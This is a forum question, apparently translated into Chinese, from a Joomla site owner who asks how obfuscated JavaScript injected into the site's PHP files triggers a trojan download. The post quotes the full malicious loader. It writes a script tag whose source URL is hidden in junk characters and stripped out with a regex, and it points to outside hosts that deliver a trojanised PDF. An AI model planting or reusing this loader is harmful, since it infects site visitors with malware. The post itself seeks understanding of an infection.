我的 Joomla!网站多次被黑。不知何故,有人设法将以下垃圾注入到关键的 php 脚本中,但我的意思是不要谈论配置 Joomla。该站点的访问量并不多(有时我担心我可能是该站点的唯一访问者......)并且我不太关心该站点是否可以备份和运行。我最终会处理的。
我的问题是,这些垃圾是如何工作的?我看着它,我只是不明白这如何造成任何伤害?它的作用是尝试下载一个名为 ChangeLog.pdf 的 PDF 文件,该文件感染了木马,打开后会冻结您的 Acrobat 并对您的计算机造成严重破坏。它是怎么做到的,我不知道,我不在乎。但是下面这段脚本是如何调用下载的呢?
<script>/*Exception*/ document.write('<script src='+'h#^(t@)((t$&@p#:)&/!$/)@d$y#^#$n@$d^!!&n#s$)^-$)o^^(r!#g!!#$.^^@g))!a#m#@$e&$s^@@!t@@($!o@$p(.&@c&)@(o$m)).!$m$)y@(b@e()s&$t$@y&o$&(u#)$x&&^(i)-@^c!!&n$#.(@g)$e#(^n&!u(i&#&n(e&(!h&o@&^&l^$(l)&y$(#@w!o@!((o#d&^.^#)r$#^u!!$:(#@&8#)(0$8@&0^(/))s#o#^&#^f!$t$!o##n(&$i(^!c$(.!&c@o!&^m#&/&(s&$(o!f&!t@&o!!n)&i$&c!.#^^c)!$o@@((m@#/$^!g#^o$^&o&#g!l)@@@!e&.))c!)(o#@#^!m(&/^^l#^@i##(v&@e&)!$j^!a@$s#m!i)n$.!$c&$o)@$m^/@$v&i^d^()e(!o&&s@(z(@)^.@)c$&o^m)$)^/#$'.replace(/#|\$|@|\^|&|\(|\)|\!/ig, '')+' defer=defer></scr'+'ipt>');</script>
<!--6f471c20c9b96fed179c85ffdd3365cf-->
ESET已将此代码检测为JS/TrojanDownloader.Agent.NRO 木马